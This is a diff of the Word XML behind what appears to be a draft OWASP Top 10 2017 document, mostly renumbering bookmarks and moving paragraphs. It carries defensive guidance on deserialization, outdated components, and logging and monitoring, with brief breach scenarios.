-          <w:ilvl w:val="0"/>
-          <w:numId w:val="47"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>The only safe architectural pattern is to not send or accept serialized objects from untrusted sources</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>If this not possible</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="48"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Implement integrity checks or encryption of the serialized objects to prevent hostile creation, tampering, replay and gadget calls</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="48"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Isolate code that deserializes, such that it runs in very low privilege environments, such as temporary containers</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="48"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Enforce type constraints over serialized objects; typically code is expecting a particular class</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="48"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Log deserialization exceptions and failures, such as where the incoming type is not the expected type, or the deserialization throws exceptions.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Larger and high performing organizations should also consider:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="49"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Rate limit API or methods that deserialize</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="49"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Restrict or monitor incoming and outgoing network connectivity from containers or servers that deserialize</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="49"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Monitor deserialization, alerting if a user deserializes constantly.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="89" w:name="references-7"/>
+        <w:t>References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="89" w:name="owasp-7"/>
       <w:bookmarkEnd w:id="89"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="90" w:name="owasp-7"/>
-      <w:bookmarkEnd w:id="90"/>
       <w:r>
         <w:rPr/>
         <w:t>OWASP</w:t>
@@ -10931,8 +10925,8 @@
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="91" w:name="external-7"/>
-      <w:bookmarkEnd w:id="91"/>
+      <w:bookmarkStart w:id="90" w:name="external-7"/>
+      <w:bookmarkEnd w:id="90"/>
       <w:r>
         <w:rPr/>
         <w:t>External</w:t>
@@ -10961,10 +10955,10 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="92" w:name="__RefHeading___Toc2392_1944273953"/>
-      <w:bookmarkStart w:id="93" w:name="a9-using-components-with-known-vulnerabilities"/>
+      <w:bookmarkStart w:id="91" w:name="__RefHeading___Toc2381_410054668"/>
+      <w:bookmarkStart w:id="92" w:name="a9-using-components-with-known-vulnerabilities"/>
+      <w:bookmarkEnd w:id="91"/>
       <w:bookmarkEnd w:id="92"/>
-      <w:bookmarkEnd w:id="93"/>
       <w:r>
         <w:rPr/>
         <w:t>A9 Using Components with Known Vulnerabilities</w:t>
@@ -11193,100 +11187,100 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="94" w:name="am-i-vulnerable-to-attack-8"/>
+      <w:bookmarkStart w:id="93" w:name="am-i-vulnerable-to-attack-8"/>
+      <w:bookmarkEnd w:id="93"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>Am I vulnerable to attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>You are likely vulnerable:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="52"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>If you do not know the versions of all components you use (both client-side and server-side). This includes components you directly use as well as nested dependencies.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="52"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>If any of your software out of date? This includes the OS, Web/App Server, DBMS, applications, APIs and all components, runtime environments and libraries.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="52"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>If you do not know if they are vulnerable. Either if you don’t research for this information or if you don’t scan them for vulnerabilities on a regular base.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="52"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>If you do not fix nor upgrade the software. E.g. if you don’t update your software to work together with this fixes. But also if you fix severe vulnerabilities too slowly.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="52"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>If you do not secure the components' configurations (see A5:2017-TBD).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="94" w:name="how-do-i-prevent-8"/>
       <w:bookmarkEnd w:id="94"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>Am I vulnerable to attack?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>You are likely vulnerable:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="52"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>If you do not know the versions of all components you use (both client-side and server-side). This includes components you directly use as well as nested dependencies.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="52"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>If any of your software out of date? This includes the OS, Web/App Server, DBMS, applications, APIs and all components, runtime environments and libraries.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="52"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>If you do not know if they are vulnerable. Either if you don’t research for this information or if you don’t scan them for vulnerabilities on a regular base.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="52"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>If you do not fix nor upgrade the software. E.g. if you don’t update your software to work together with this fixes. But also if you fix severe vulnerabilities too slowly.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="52"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>If you do not secure the components' configurations (see A5:2017-TBD).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="95" w:name="how-do-i-prevent-8"/>
-      <w:bookmarkEnd w:id="95"/>
       <w:r>
         <w:rPr/>
         <w:t>How do I prevent</w:t>
@@ -11469,8 +11463,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="96" w:name="example-scenarios-7"/>
-      <w:bookmarkEnd w:id="96"/>
+      <w:bookmarkStart w:id="95" w:name="example-scenarios-7"/>
+      <w:bookmarkEnd w:id="95"/>
       <w:r>
         <w:rPr/>
         <w:t>Example Scenarios</w:t>
@@ -11593,20 +11587,20 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="97" w:name="references-8"/>
+      <w:bookmarkStart w:id="96" w:name="references-8"/>
+      <w:bookmarkEnd w:id="96"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="97" w:name="owasp-8"/>
       <w:bookmarkEnd w:id="97"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="98" w:name="owasp-8"/>
-      <w:bookmarkEnd w:id="98"/>
       <w:r>
         <w:rPr/>
         <w:t>OWASP</w:t>
@@ -11709,8 +11703,8 @@
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="99" w:name="external-8"/>
-      <w:bookmarkEnd w:id="99"/>
+      <w:bookmarkStart w:id="98" w:name="external-8"/>
+      <w:bookmarkEnd w:id="98"/>
       <w:r>
         <w:rPr/>
         <w:t>External</w:t>
@@ -11829,10 +11823,10 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="100" w:name="__RefHeading___Toc2394_1944273953"/>
-      <w:bookmarkStart w:id="101" w:name="a10-insufficient-logging-and-monitoring"/>
+      <w:bookmarkStart w:id="99" w:name="__RefHeading___Toc2383_410054668"/>
+      <w:bookmarkStart w:id="100" w:name="a10-insufficient-logging-and-monitoring"/>
+      <w:bookmarkEnd w:id="99"/>
       <w:bookmarkEnd w:id="100"/>
-      <w:bookmarkEnd w:id="101"/>
       <w:r>
         <w:rPr/>
         <w:t>A10 Insufficient Logging and Monitoring</w:t>
@@ -12061,11 +12055,75 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="102" w:name="am-i-vulnerable-to-attack-9"/>
+      <w:bookmarkStart w:id="101" w:name="am-i-vulnerable-to-attack-9"/>
+      <w:bookmarkEnd w:id="101"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>Am I vulnerable to attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Insufficient logging and monitoring occurs anytime:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="56"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Auditable events, such as logins, failed logins, and high value transactions are not logged</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="56"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Logs are not monitored for suspicious activity</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="56"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Alerting or escalation as per the risk of the data held by the application is not in place or effective.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="102" w:name="how-do-i-prevent-9"/>
       <w:bookmarkEnd w:id="102"/>
       <w:r>
         <w:rPr/>
-        <w:t>Am I vulnerable to attack?</w:t>
+        <w:t>How do I prevent</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12075,49 +12133,87 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>Insufficient logging and monitoring occurs anytime:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="56"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Auditable events, such as logins, failed logins, and high value transactions are not logged</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="56"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Logs are not monitored for suspicious activity</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="56"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Alerting or escalation as per the risk of the data held by the application is not in place or effective.</w:t>
+        <w:t>As per the risk of the data stored or processed by the application:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="57"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Ensure all login and high value transactions can be logged</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="57"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Ensure sensitive and private information is not logged, or masked or truncated as per privacy laws and regulations</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="57"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Ensure stack traces and detailed errors are not sent to the screen, but to logs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="57"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Ensure logs cannot easily be deleted or cleared without authorization</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="57"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Establish effective monitoring and alerting, such that suspicious activities such as brute force attacks or business loss are detected and responded within acceptable time periods.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Large or high performing organizations should have application security incident response plans in place, and tested across web apps and API services, with tooling integrated into processes, people and training. Such organizations may wish to invest in log correlation and analysis or security event incident management (SIEM) software or services. Open source and commercial offerings should be considered in light of organizational objectives and budget.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12125,11 +12221,11 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="103" w:name="how-do-i-prevent-9"/>
+      <w:bookmarkStart w:id="103" w:name="example-scenarios-8"/>
       <w:bookmarkEnd w:id="103"/>
       <w:r>
         <w:rPr/>
-        <w:t>How do I prevent</w:t>
+        <w:t>Example Scenarios</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12139,87 +12235,17 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>As per the risk of the data stored or processed by the application:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="57"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Ensure all login and high value transactions can be logged</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="57"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Ensure sensitive and private information is not logged, or masked or truncated as per privacy laws and regulations</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="57"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Ensure stack traces and detailed errors are not sent to the screen, but to logs</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="57"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Ensure logs cannot easily be deleted or cleared without authorization</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="57"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Establish effective monitoring and alerting, such that suspicious activities such as brute force attacks or business loss are detected and responded within acceptable time periods.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Large or high performing organizations should have application security incident response plans in place, and tested across web apps and API services, with tooling integrated into processes, people and training. Such organizations may wish to invest in log correlation and analysis or security event incident management (SIEM) software or services. Open source and commercial offerings should be considered in light of organizational objectives and budget.</w:t>
+        <w:t>Target, a large US retailer, had an internal malware analysis sandbox analyzing attachments. The sandbox software had detected potentially unwanted software, but no one responded to this detection. By the time the point of sale breach was discovered, the sandbox had been alerting on this issue for over six months. Since this time, Target has invested heavily in security operations, including training, and network and application oversight.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>An open source project forum software run by a small team was hacked using a flaw in its software. The attackers managed to wipe out the internal source code repository containing the next version, and all of the forum contents. Although source could be recovered, the lack of monitoring, logging or alerting led to a far worse breach. The forum software project is no longer active as a result of this issue.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12227,52 +12253,20 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="104" w:name="example-scenarios-8"/>
+      <w:bookmarkStart w:id="104" w:name="references-9"/>
       <w:bookmarkEnd w:id="104"/>
       <w:r>
         <w:rPr/>
-        <w:t>Example Scenarios</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Target, a large US retailer, had an internal malware analysis sandbox analyzing attachments. The sandbox software had detected potentially unwanted software, but no one responded to this detection. By the time the point of sale breach was discovered, the sandbox had been alerting on this issue for over six months. Since this time, Target has invested heavily in security operations, including training, and network and application oversight.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>An open source project forum software run by a small team was hacked using a flaw in its software. The attackers managed to wipe out the internal source code repository containing the next version, and all of the forum contents. Although source could be recovered, the lack of monitoring, logging or alerting led to a far worse breach. The forum software project is no longer active as a result of this issue.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="105" w:name="references-9"/>
+        <w:t>References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="105" w:name="owasp-9"/>
       <w:bookmarkEnd w:id="105"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="106" w:name="owasp-9"/>
-      <w:bookmarkEnd w:id="106"/>
       <w:r>
         <w:rPr/>
         <w:t>OWASP</w:t>
@@ -12385,8 +12379,8 @@
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="107" w:name="external-9"/>
-      <w:bookmarkEnd w:id="107"/>
+      <w:bookmarkStart w:id="106" w:name="external-9"/>
+      <w:bookmarkEnd w:id="106"/>
       <w:r>
         <w:rPr/>
         <w:t>External</w:t>
@@ -12433,20 +12427,20 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="108" w:name="d-whats-next-for-developers"/>
+      <w:bookmarkStart w:id="107" w:name="d-whats-next-for-developers"/>
+      <w:bookmarkEnd w:id="107"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>+D What's Next for Developers</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="108" w:name="establish-use-repeatable-security-processes-and-standard-security-controls"/>
       <w:bookmarkEnd w:id="108"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>+D What's Next for Developers</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="109" w:name="establish-use-repeatable-security-processes-and-standard-security-controls"/>
-      <w:bookmarkEnd w:id="109"/>
       <w:r>
         <w:rPr/>
         <w:t>Establish &amp; Use Repeatable Security Processes and Standard Security Controls</w:t>
@@ -12933,23 +12927,11 @@
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
           </w:rPr>
-          <w:t>hardcopy</w:t>
+          <w:t>hardcopy or as eBooks</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
         <w:rPr/>
-        <w:t xml:space="preserve"> or as </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId124">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
-          </w:rPr>
-          <w:t>eBooks</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr/>
         <w:t>.</w:t>
       </w:r>
     </w:p>
@@ -12958,22 +12940,22 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="110" w:name="__RefHeading___Toc2396_1944273953"/>
-      <w:bookmarkStart w:id="111" w:name="t-whats-next-for-security-testing"/>
+      <w:bookmarkStart w:id="109" w:name="__RefHeading___Toc2385_410054668"/>
+      <w:bookmarkStart w:id="110" w:name="t-whats-next-for-security-testing"/>
+      <w:bookmarkEnd w:id="109"/>
       <w:bookmarkEnd w:id="110"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>+T What's Next for Security Testing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="111" w:name="establish-continuous-application-security-testing"/>
       <w:bookmarkEnd w:id="111"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>+T What's Next for Security Testing</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="112" w:name="establish-continuous-application-security-testing"/>
-      <w:bookmarkEnd w:id="112"/>
       <w:r>
         <w:rPr/>
         <w:t>Establish Continuous Application Security Testing</w:t>
@@ -13283,65 +13265,133 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="113" w:name="__RefHeading___Toc2398_1944273953"/>
-      <w:bookmarkStart w:id="114" w:name="o-whats-next-for-organizations"/>
+      <w:bookmarkStart w:id="112" w:name="__RefHeading___Toc2387_410054668"/>
+      <w:bookmarkStart w:id="113" w:name="o-whats-next-for-organizations"/>
+      <w:bookmarkEnd w:id="112"/>
       <w:bookmarkEnd w:id="113"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>+O What's Next for Organizations</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="114" w:name="start-your-application-security-program-now"/>
       <w:bookmarkEnd w:id="114"/>
       <w:r>
         <w:rPr/>
-        <w:t>+O What's Next for Organizations</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="115" w:name="start-your-application-security-program-now"/>
